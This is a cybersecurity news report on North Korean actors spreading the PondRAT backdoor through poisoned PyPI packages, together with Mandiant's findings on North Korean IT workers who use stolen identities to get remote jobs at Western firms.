Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.
PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in attacks related to the 3CX supply chain compromise last year.
Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware.
"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with moderate confidence to a threat actor called Gleaming Pisces.
The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that's also known for distributing the AppleJeus malware.
It's believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."
The list of malicious packages, now removed from the PyPI repository, is below -
- real-ids (893 downloads)
- coloredtxt (381 downloads)
- beautifultext (736 downloads)
- minisound (416 downloads)
The infection chain is fairly simple in that the packages, once downloaded and installed on developer systems, are engineered to execute an encoded next-stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server.
Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.
"The Linux and macOS versions [of POOLRAT] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.
"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the [command-and-control server] is nearly identical."
PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.
"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.
"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."
The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."
It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and that it poses a "serious risk for any company with remote-only employees."
Mandiant Details TTPs of North Korea IT Workers
Google-owned Mandiant, which has assigned the name UNC5267 to North Korea IT worker operations, said it consists of individuals sent by the government to live in China, Russia, and to a lesser extent in Africa and Southeast Asia, to land lucrative jobs within Western companies, specifically in the U.S. tech sector.
"UNC5267 gains initial access through the use of stolen identities to apply for various positions or are brought in as a contractor," it said. "UNC5267 operators have primarily applied for positions that offer 100% remote work."
The threat intelligence firm further noted that a single DPRK IT worker could be working multiple jobs at once, drawing salaries from different companies on a monthly basis.
The long term objectives of the activity cluster include financial gain via illicit salary withdrawals, maintaining long-term access to victim networks, and likely abusing the unauthorized access for espionage or disruptive activity.
"A recurring characteristic of resumes utilized by UNC5267 is the use of addresses based in the United States coupled with education credentials from universities outside of North America, frequently in countries such as Singapore, Japan, or Hong Kong," Mandiant said.
As previously disclosed by CrowdStrike, UNC5267 actors accomplish their duties by remotely connecting to company-issued laptops using tools like GoToRemote, GoToMeeting, Chrome Remote Desktop, AnyDesk, TeamViewer, and TeamViewer. These connections originate from IP addresses associated with Astrill VPN.
Another noteworthy aspect is the discrepancy between the location where they claim to currently live and the location to which the laptop shipment is delivered to (i.e., a laptop farm). The IT workers have also been observed using stolen identities to secure jobs.
"North Korea's IT workforce, despite operating under significant constraints, presents a persistent and escalating cyber threat," Mandiant said. "The dual motivations behind their activities — fulfilling state objectives and pursuing personal financial gains—make them particularly dangerous."
